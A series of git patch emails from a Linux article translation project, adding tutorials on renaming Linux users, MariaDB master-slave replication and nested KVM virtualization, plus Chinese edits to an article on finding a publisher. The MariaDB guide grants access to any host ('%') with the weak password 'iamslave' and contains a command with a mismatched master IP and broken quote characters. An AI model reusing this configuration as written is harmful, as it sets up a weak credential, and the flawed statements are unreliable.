we can rename the home directory or its UID as well. + +In this short tutorial, we will be discussing these things only. Let's start by renaming user in Linux first, + + **(Recommended Read:[How to use FIND command to locate anything in Linux][1])** + +### Rename user in Linux + +For renaming user in Linux systems, we will use ** 'usermod'** command. Syntax for the command is, + + **$ usermod -l new_username old_username** + +For example, if we have a user named ** 'dan'** & want to rename it to **' susan'**, execute the following command from terminal; + + **$ sudo usermod -l susan dan** + +This will only change the username & everything else, like group, home directory, UID will remain same. + + **Note:-** You should need to logged out from the account you are trying to rename. You can also kill all the processes running for that user, to do so execute the following command, + + **$ sudo pkill -u dan** + + **$ sudo pkill -9 -u dan** + +### Renaming Home directory + +For renaming home directory to correspond to the renamed user, we use ** '-d'** option with **' usermod'** command., + + **$ sudo usermod -d /home/susan -m susan** + +### Changing UID for the user + +To change the UID of the user , execute the following command, + + **$ sudo usermod -u 2000 susan** + +where **' 2000'** is the new UID for user. + +### Renaming the group + +To rename the group from ** 'dan'** to **' susan**', we will use **' groupmod'** command. Use the following command to rename the group, + + **$ groupmod -n susan dan** + +Once we have made the required changes, we can than check the changes made using the ** 'id'** command, + + **$ id susan** + +With this we end this tutorial on how to rename user in Linux. Please let us know if you have any question or any issue or if you do have any suggestion, please do let us know that as well. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/rename-user-in-linux-rename-home-directory/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/use-of-find-command/ From 976e6acefa44bc76f4c6430d9eb018c351b2e810 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:21:07 +0800 Subject: [PATCH 0867/1627] add translating flag --- ...e user in Linux (also rename group - home directory).md | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md b/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md index 20ea0ab04b..30a65a62ad 100644 --- a/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md +++ b/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md @@ -1,11 +1,10 @@ +translating by lujun9972 How to rename user in Linux (also rename group & home directory) ====== We might have come across a situation where we might want to rename user in Linux system, for whatever reasons. We can easily rename user in Linux & also we can rename the home directory or its UID as well. In this short tutorial, we will be discussing these things only. Let's start by renaming user in Linux first, - - **(Recommended Read:[How to use FIND command to locate anything in Linux][1])** - +**(Recommended Read:[How to use FIND command to locate anything in Linux][1])** ### Rename user in Linux For renaming user in Linux systems, we will use ** 'usermod'** command. Syntax for the command is, @@ -56,7 +55,7 @@ With this we end this tutorial on how to rename user in Linux. Please let us kno via: http://linuxtechlab.com/rename-user-in-linux-rename-home-directory/ 作者:[Shusain][a] -译者:[译者ID](https://github.com/译者ID) +译者:[lujun9972](https://github.com/lujun9972) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From e246e2167ad01091faca2121e464a94864783eda Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:28:23 +0800 Subject: [PATCH 0868/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Step=20by=20Ste?= =?UTF-8?q?p=20guide=20for=20creating=20Master=20Slave=20replication=20in?= =?UTF-8?q?=20MariaDB?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ing Master Slave replication in MariaDB.md | 185 ++++++++++++++++++ 1 file changed, 185 insertions(+) create mode 100644 sources/tech/20171112 Step by Step guide for creating Master Slave replication in MariaDB.md diff --git a/sources/tech/20171112 Step by Step guide for creating Master Slave replication in MariaDB.md b/sources/tech/20171112 Step by Step guide for creating Master Slave replication in MariaDB.md new file mode 100644 index 0000000000..922ef18040 --- /dev/null +++ b/sources/tech/20171112 Step by Step guide for creating Master Slave replication in MariaDB.md @@ -0,0 +1,185 @@ +Step by Step guide for creating Master Slave replication in MariaDB +====== +In our earlier tutorials,we have already learned [**to install & configure MariaDB**][1] & also [**learned some basic administration commands for managing MariaDB**][2]. We are now going to learn to setup a MASTER SLAVE replication for MariaDB server. + +Replication is used to create multiple copies of our database & these copies then can either be used as another database to run our queries on, queries that might otherwise affect performance of master server like running some heavy analytics queries or we can just use them for data redundancy purposes or for both. We can automate the whole process i.e. data replication occurs automatically from master to slave. Backups are be done without affecting the write operations of the master + +So we will now setup our **master-slave** replication, for this we need two machines with Mariadb installed. IP addresses for the both the machines are mentioned below, + + **Master -** 192.168.1.120 **Hostname-** master.ltechlab.com + + **Slave -** 192.168.1.130 **Hostname -** slave.ltechlab.com + +Once MariaDB has been installed in those machines, we will move on with the tutorial. If you need help installing and configuring maridb, have a[ **look at our tutorial HERE.**][1] + + +### **Step 1- Master Server Configuration** + +We are going to take a database named ' **important '** in MariaDB, that will be replicated to our slave server. To start the process, we will edit the files ' **/etc/my.cnf** ' , it's the configuration file for mariadb, + +``` +$ vi /etc/my.cnf +``` + +& look for section with [mysqld] & then enter the following details, + +``` +[mysqld] +log-bin +server_id=1 +replicate-do-db=important +bind-address=192.168.1.120 +``` + +Save & exit the file. Once done, restart the mariadb services, + +``` +$ systemctl restart mariadb +``` + +Next, we will login to our mariadb instance on master server, + +``` +$ mysql -u root -p +``` + +& then will create a new user for slave named 'slaveuser' & assign it necessary privileges by running the following command + +``` +STOP SLAVE; +GRANT REPLICATION SLAVE ON *.* TO 'slaveuser'@'%' IDENTIFIED BY 'iamslave'; +FLUSH PRIVILEGES; +FLUSH TABLES WITH READ LOCK; +SHOW MASTER STATUS; +``` + +**Note:- ** We need values from **MASTER_LOG_FILE and MASTER_LOG_POS ** from out of 'show master status' for configuring replication, so make sure that you have those. + +Once these commands run successfully, exit from the session by typing 'exit'. + +### Step2 - Create a backup of the database & move it slave + +Now we need to create backup of our database 'important' , which can be done using 'mysqldump' command, + +``` +$ mysqldump -u root -p important > important_backup.sql +``` + +Once the backup is complete, we need to log back into the mariadb & unlock our tables, + +``` +$ mysql -u root -p +$ UNLOCK TABLES; +``` + +& exit the session. Now we will move the database backup to our slave server which has a IPaddress of 192.168.1.130, + +This completes our configuration on Master server, we will now move onto configuring our slave server. + +### Step 3 Configuring Slave server + +We will again start with editing '/etc/my.cnf' file & look for section [mysqld] & enter the following details, + +``` +[mysqld] +server-id = 2 +replicate-do-db=important +[ …] +``` + +We will now restore our database to mariadb, by running + +``` +$ mysql -u root -p < /data/ important_backup.sql +``` + +When the process completes, we will provide the privileges to 'slaveuser' on db 'important' by logging into mariadb on slave server, + +``` +$ mysql -u root -p +``` + +``` +GRANT ALL PRIVILEGES ON important.* TO 'slaveuser'@'localhost' WITH GRANT OPTION; +FLUSH PRIVILEGES; +``` + +Next restart mariadb for implementing the changes. + +``` +$ systemctl restart mariadb +``` + +### **Step 4 Start the replication** + +Remember, we need **MASTER_LOG_FILE and MASTER_LOG_POS** variables which we got from running 'SHOW MASTER STATUS' on mariadb on master server. Now login to mariadb on slave server & we will tell our slave server where to look for the master by running the following commands, + +``` +STOP SLAVE; +CHANGE MASTER TO MASTER_HOST= '192.168.1.110′, MASTER_USER='slaveuser', MASTER_PASSWORD='iamslave', MASTER_LOG_FILE='mariadb-bin.000001′, MASTER_LOG_POS=460; +SLAVE START; +SHOW SLAVE STATUS\G; +``` + +**Note:-** Change details of your master as necessary. + +### Step 5 Testing the replication + +We will now create a new tables in our database on master to make sure if the replication is working or not. So, login to mariadb on master server, + +``` +$ mysql -u root -p +``` + +select the database 'important', + +``` +use important; +``` + +and create a table named test in the db, + +``` +create table test (c int); +``` + +then insert some value into it, + +``` +insert into test (c) value (1); +``` + +To check the added value, + +``` +select * from test; +``` + +& you will find that your db has a table has the value you inserted. + +Now let's login to our slave database to make sure if our data replication is working, + +``` +$ mysql -u root -p +$ use important; +$ select * from test; +``` + +You will see that the output shows the same value that we inserted on the master server, hence our replication is working fine without any issues. + +This concludes our tutorial, please send your queries/questions through the comment box below. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/creating-master-slave-replication-mariadb/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/installing-configuring-mariadb-rhelcentos/ +[2]:http://linuxtechlab.com/mariadb-administration-commands-beginners/ From 0aa3b72143fa16a5a3ba1468d65043ee4950d870 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 29 Dec 2017 17:45:17 +0800 Subject: [PATCH 0869/1627] PRF:20171201 How to find a publisher for your tech book.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 二校。 --- ... to find a publisher for your tech book.md | 45 +++++++------------ 1 file changed, 16 insertions(+), 29 deletions(-) diff --git a/translated/tech/20171201 How to find a publisher for your tech book.md b/translated/tech/20171201 How to find a publisher for your tech book.md index 4f27cba2b7..6aed81b99a 100644 --- a/translated/tech/20171201 How to find a publisher for your tech book.md +++ b/translated/tech/20171201 How to find a publisher for your tech book.md @@ -5,51 +5,38 @@ ![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") -你有一个写本科技书籍的想法,那么祝贺你!就像徒步旅行,或者是去学做一种甜点心,写一本书就像人们说的那些事情一样,但是却都只停留在思考的初级阶段。那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你缺少如何完成它的足够信息。 +你有一个写本科技书籍的想法,那么祝贺你!就像在阿巴拉契亚山脉徒步旅行,或者是去学做一种蛋奶酥,写书是人们经常讨论的话题之一,但是却都只停留在思考的初级阶段。那是可以理解的,因为失败的几率是很高的。要想实现它,你需要在把自己的想法阐述给出版商,去探讨是否已经做好充分的准备去写成一本书。要去实现这一步是相当困难的,但缺乏关于如何做这件事的信息会使事情变得复杂。 -如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是 [Pragmatci Bookshelf][4] 的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 +如果你想和一家传统的出版商合作,那么你需要在他们面前推销你的书稿以期望能够得到出版的机会。因为我是 [Pragmatci Bookshelf][4] 的总编,所以经常看到很多的选题,也去帮助作者制作出好的作品。这些选题中有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你找到最适合的出版商,来让你的想法得到认可。 -### 鉴别出你的目标 +### 确定你的目标 -你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的出版商开始将会大大缩小你的搜索范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来 - -下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,但他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如 C++ 或者 Java。你以 Elixir 为主题的书籍就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。 - -一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的书籍的主题一样或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在该技术领域里的新方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。 - -如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言或者类库一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们的读者群体。他们的评估标准可能和你的是不一样的。唯一的途径是通过投稿来试探。 +你的第一步是要找出最适合你的想法的出版商。首先,想想你经常买书的以及你喜欢的出版商,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的出版商开始,列出一个简短的列表将会大大缩小你的搜索范围。如果你自己所买的书籍并不多。那么可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的几家出版商的清单出来。 下一步,筛选出你期望的出版商,尽管大多数技术类出版商看起来没什么差别,但他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如 C++ 或者 Java,那么你以 Elixir 为主题的书稿就可能不适合那个出版商;如果你的书稿是关于教授小孩学习编程的,那么你可能就不想让学术出版商来出版。 一旦确定了一些目标,你就可以在他们的商品目录、网站或者亚马逊上对其进行进一步的调查,去寻找有哪些书籍和你的思想是相符的。如果他们能有一本和你自己的书稿主题一样或很相近的书,那么你将很难说服他们和你签约。但那并不意味着已经可以把这样的出版商从你的列表中划掉,你可以将自己的书稿主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于该技术领域里的新方法,确保你的书稿能够弥补现有书的不足,更加完善,而不是单纯的竞争。 如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好迹象,但也许是个坏迹象。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为自己的读者不会感兴趣,也可能是因为他们曾经在这块领域遇到过麻烦。新的语言或者类库一直在不停地涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们的读者群体。他们的评估标准可能和你的是不一样的。他们已经有了最终决定,也可能是还在等待合适的选题。判断究竟是哪一种的唯一方法就是提出文稿并找出答案。 ### 建立起你自己的网络 -鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,出版业你认识的人却往往不是你所需要找的人。你需要认识的那个人是一个去发现新市场、新作者和新选题的组稿编辑。如果你认识某个和出版商有关系的人,请他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块的编辑通常会很乐意将你介绍给符合你的主题的编辑。 +确定一家出版商是第一步;现在你需要与其建立联系。不幸的是,出版需要的仍旧是你认识什么人,而不是你知道什么。你需要认识的那个人是一个去发现新市场、新作者和新选题的策划编辑。如果你认识某个和出版商有关系的人,请他给你介绍一位策划编辑。这些策划编辑往往负责一个专题板块,尤其是在较大的出版商,但你并非一定要找到符合你书稿的专题板块的编辑。各类板块的编辑通常都会很乐意将你介绍给合适的编辑。 + 有时候你也许能够在一个技术会议上找到一个策划编辑,特别是在出版商同时也是赞助商,而且还有一个展台时。即使当时并没有一个策划编辑在场,展台的其他工作人员也能够帮你和策划编辑建立联系。 如果会议不符合你的主题思想,那就需要你利用自己的社交网络来获得别人的推荐。比如使用 LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。 对于小型的出版商,你可能会在公司网站上发现策划编辑的名单,如果你够幸运的话,还可以找到他们的联系信息。如果找不到联系方式的话,可以在推特上搜寻出版商的名字,试试能否找到他们的编辑的信息,在社交媒体上去寻找一位陌生的人,然后把自己的书稿推荐给他,这也许会让你有些紧张,但是你真的不必去担心这些,建立联系也是策划编辑的工作之一。最坏的结果只不过是他们忽视你而已。 一旦建立起联系,策划编辑将会协助你进行下一步。他们可能会立刻对你的书稿给予反馈,或者在他们可能想让你根据他们的指导来修改你的文章,使其变得更加充实。当你经过努力找到了一名策划编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作流程。 -有时候你也许能够在一个技术论坛展会上找到一个组稿编辑,特别是出版商是赞助商,而且还有一个展台时。即使在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果论坛不符合你的主题思想,你需要利用你的社交网络来获得别人的推荐。使用 LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。 +### 如果其他的方法都失败了 -对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己的书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一。最坏的结果只不过是他们忽视你而已。 - -一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 - -### 如果其它的方法都失败了 - -如果你无法找到一名组稿编辑,出版商通常会有一个书稿盲投proposal alias的方式,通常是 `proposals@[publisher].com` 的格式。 查找他们网站的介绍找到如何去发送书稿;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃,不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为书稿并不能回答那些问题。整理他们对你的要求(一篇独立的主题文章),发给他们,然后就去期望能够得到满意的答复。 +如果你无法联系到一名策划编辑,出版商通常会有一个书稿盲投proposal alias的方式来接受投稿,通常是 `proposals@[publisher].com` 的格式。 查找他们网站的介绍,找到如何去发送书稿;有的出版商是有特殊的要求的。你需要遵循他们的要求,如果不这样做的话,你的书稿将会被丢弃,它不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,那么你需要再尝试着去找一名编辑进一步地沟通,因为书稿并不能回答那些问题。整理他们对你的要求(一篇独立的主题文章),发给他们,然后你要做的就是期望能够得到满意的答复。 -### 然后就是……等待 +### 等待 -无论你和一个出版商有着多么密切的联系,你也得等待着。如果你已经投递了书稿,也许要过一段时间才有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位组稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在目标之一,所以你可能不会很快得到答复。几乎所有的出版商都会在最终确认之前召开一次组委会来决定接受哪个稿件,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。 +无论你是如何与一个出版商取得联系的,你也得等待着。如果你已经投递了书稿,也许要过一段时间才有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位策划编辑去处理你的投稿,你可能也只是他同时在处理的潜在目标之一,所以你可能不会很快得到答复。几乎所有的出版商都会在最终确认之前召开一次组委会来决定接受哪个稿件,所以即使你的书稿已经足够的优秀,并且可以出版了,你也仍然需要等待组委会开会讨论。你可能需要等待几周,甚至是一个月的时间。 + 几周过后,你可以和编辑再联系一下,看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们仍然没有回复,也许是因为他们有太多的投稿需要处理,即使你不停地催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你,也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况下你除了耐心地等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自出版。 -几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们仍然回复,也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你,也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。 +### 祝好运 -### 好运气 - -如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方、合适的时间,和合适的人探讨,而且还要期待他们此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。 - -寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的 SeaGLS 上,我对整个过程的介绍指导有个[演讲][5]。去看看那个[视频][6]获得更多的细节信息。 +如果你觉得这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要在合适的时间地点,与合适的人沟通,而且还要期待他们此时有好的心情。你无法去控制这些不确定的因素,但是更好地了解行业的工作方式,以及出版商的需求,可以帮助你完善它们。 + 寻找一个出版商只是万里长征的第一步。你需要提炼你的思想,并创建选题,以及其他方面的考虑。在今年的 SeaGLS 上,我对整个过程做了[介绍][5]。查看[视频][6]可以获取更详细的信息。 ### 关于作者 [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] -麦克唐纳先生现在是 Pragmatic Bookshelf 的主管编辑。在过去的 20 年里,在技术出版领域,他是一名编辑、一名作者、偶尔还去客串演讲者或者讲师。他现在把大量的时间都用来去和新作者探讨如何更好的表达出他们的想法。你可以关注他的推特@bmac_editor。 +麦克唐纳先生现在是 Pragmatic Bookshelf 的总编。过去 20 年在技术出版领域生涯中,他是一名编辑、一名作者,偶尔还去客串演讲者或者讲师。他现在把大量的时间都用来和新作者探讨如何更好地表达出他们的想法。你可以关注他的推特@bmac_editor。 如果这篇文章点燃你写书的热情,但又不知道如何找到合适的途径联系出版商,不如逛逛像异步社区这样的网站,按照上文的步骤尝试一下,也许能够发现新的希望。 -------------------------------------------------------------------------------- @@ -57,7 +44,7 @@ via: https://opensource.com/article/17/12/how-find-publisher-your-book 作者:[Brian MacDonald][a] 译者:[FelixYFZ](https://github.com/FelixYFZ) -校对:[wxy](https://github.com/wxy) +校对:[wxy](https://github.com/wxy), 陈聪聪 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 2af501fec6fc272c2b952edc15922228c6f604ec Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 29 Dec 2017 17:45:44 +0800 Subject: [PATCH 0870/1627] PUB:20171201 How to find a publisher for your tech book.md @FelixYFZ https://linux.cn/article-9189-1.html --- .../20171201 How to find a publisher for your tech book.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171201 How to find a publisher for your tech book.md (100%) diff --git a/translated/tech/20171201 How to find a publisher for your tech book.md b/published/20171201 How to find a publisher for your tech book.md similarity index 100% rename from translated/tech/20171201 How to find a publisher for your tech book.md rename to published/20171201 How to find a publisher for your tech book.md From 0611fb57bd4a2cb82053cb07303fc4e3b398d499 Mon Sep 17 00:00:00 2001 From: zjon Date: Fri, 29 Dec 2017 22:48:27 +0800 Subject: [PATCH 0871/1627] zjon translating --- ...o enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md b/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md index c6dd0cde73..09016734af 100644 --- a/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md +++ b/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md @@ -1,3 +1,4 @@ +zjon Translating How to enable Nested Virtualization in KVM on CentOS 7 / RHEL 7 ====== **Nested virtualization** means to configure virtualization environment inside a virtual machine. In other words we can say nested virtualization is a feature in the hypervisor which allows us to install & run a virtual machine inside a virtual server via hardware acceleration from the **hypervisor** (host). From 91516b127a975f27df5a310dd3f0345487bec5fb Mon Sep 17 00:00:00 2001 From: zjon Date: Fri, 29 Dec 2017 23:01:36 +0800 Subject: [PATCH 0872/1627] translated --- ...tualization in KVM on CentOS 7 - RHEL 7.md | 117 ------------------ 1 file changed, 117 deletions(-) delete mode 100644 sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md diff --git a/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md b/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md deleted file mode 100644 index 09016734af..0000000000 --- a/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md +++ /dev/null @@ -1,117 +0,0 @@ -zjon Translating -How to enable Nested Virtualization in KVM on CentOS 7 / RHEL 7 -====== -**Nested virtualization** means to configure virtualization environment inside a virtual machine. In other words we can say nested virtualization is a feature in the hypervisor which allows us to install & run a virtual machine inside a virtual server via hardware acceleration from the **hypervisor** (host). - -In this article, we will discuss how to enable nested virtualization in KVM on CentOS 7 / RHEL 7. I am assuming you have already configured KVM hypervisor. In case you have not familiar on how to install and configure **KVM hypervisor** , then refer the following article - -Let's jump into the hypervisor and verify whether nested virtualization is enabled or not on your KVM host - -For Intel based Processors run the command, -``` -[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested -N -[root@kvm-hypervisor ~]# -``` - -For AMD based Processors run the command, -``` -[root@kvm-hypervisor ~]# cat /sys/module/kvm_amd/parameters/nested -N -[root@kvm-hypervisor ~]# -``` - -In the above command output 'N' indicates that Nested virtualization is disabled. If we get the output as 'Y' then it indicates that nested virtualization is enabled on your host. - -Now to enable nested virtualization, create a file with the name " **/etc/modprobe.d/kvm-nested.conf** " with the following content. -``` -[root@kvm-hypervisor ~]# vi /etc/modprobe.d/kvm-nested.conf -options kvm-intel nested=1 -options kvm-intel enable_shadow_vmcs=1 -options kvm-intel enable_apicv=1 -options kvm-intel ept=1 -``` - -Save & exit the file - -Now remove ' **kvm_intel** ' module and then add the same module with modprobe command. Before removing the module, make sure VMs are shutdown otherwise we will get error message like " **modprobe: FATAL: Module kvm_intel is in use** " -``` -[root@kvm-hypervisor ~]# modprobe -r kvm_intel -[root@kvm-hypervisor ~]# modprobe -a kvm_intel -[root@kvm-hypervisor ~]# -``` - -Now verify whether nested virtualization feature enabled or not. -``` -[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested -Y -[root@kvm-hypervisor ~]# -``` - -#### - -Test Nested Virtualization - -Let's suppose we have a VM with name "director" on KVM hypervisor on which I have enabled nested virtualization. Before testing, make sure CPU mode for the VM is either as " **host-model** " or " **host-passthrough** " , to check cpu mode of a virtual machine use either Virt-Manager GUI or virsh edit command - -![cpu_mode_vm_kvm][1] - -![cpu_mode_vm_kvm][2] - -Now login to the director VM and run lscpu and lsmod command -``` -[root@kvm-hypervisor ~]# ssh 192.168.126.1 -l root -root@192.168.126.1's password: -Last login: Sun Dec 10 07:05:59 2017 from 192.168.126.254 -[root@director ~]# lsmod | grep kvm -kvm_intel             170200  0 -kvm                   566604  1 kvm_intel -irqbypass              13503  1 kvm -[root@director ~]# -[root@director ~]# lscpu -``` - -![lscpu_command_rhel7_centos7][1] - -![lscpu_command_rhel7_centos7][3] - -Let's try creating a virtual machine either from virtual manager GUI or virt-install inside the director vm, in my case i am using virt-install command -``` -[root@director ~]# virt-install  -n Nested-VM  --description "Test Nested VM"  --os-type=Linux  --os-variant=rhel7  --ram=2048  --vcpus=2  --disk path=/var/lib/libvirt/images/nestedvm.img,bus=virtio,size=10  --graphics none  --location /var/lib/libvirt/images/CentOS-7-x86_64-DVD-1511.iso --extra-args console=ttyS0 -Starting install... -Retrieving file .treeinfo...                                                   | 1.1 kB  00:00:00 -Retrieving file vmlinuz...                                                     | 4.9 MB  00:00:00 -Retrieving file initrd.img...                                                  |  37 MB  00:00:00 -Allocating 'nestedvm.img'                                                      |  10 GB  00:00:00 -Connected to domain Nested-VM -Escape character is ^] -[    0.000000] Initializing cgroup subsys cpuset -[    0.000000] Initializing cgroup subsys cpu -[    0.000000] Initializing cgroup subsys cpuacct -[    0.000000] Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015 -……………………………………………… -``` - -![cli-installer-virt-install-command-kvm][1] - -![cli-installer-virt-install-command-kvm][4] - -This confirms that nested virtualization has been enabled successfully as we are able to create virtual machine inside a virtual machine. - -This Concludes the article, please do share your feedback and comments. - --------------------------------------------------------------------------------- - -via: https://www.linuxtechi.com/enable-nested-virtualization-kvm-centos-7-rhel-7/ - -作者:[Pradeep Kumar][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxtechi.com -[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif -[2]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cpu_mode_vm_kvm.jpg -[3]:https://www.linuxtechi.com/wp-content/uploads/2017/12/lscpu_command_rhel7_centos7-1024x408.jpg -[4]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cli-installer-virt-install-command-kvm.jpg From 0746e5a3b26b96753a264bdfb114c8c29eac4ce1 Mon Sep 17 00:00:00 2001 From: zjon Date: Fri, 29 Dec 2017 23:05:24 +0800 Subject: [PATCH 0873/1627] update translated --- ...tualization in KVM on CentOS 7 - RHEL 7.md | 123 ++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 translated/20171212 How to enable Nested Virtualization in 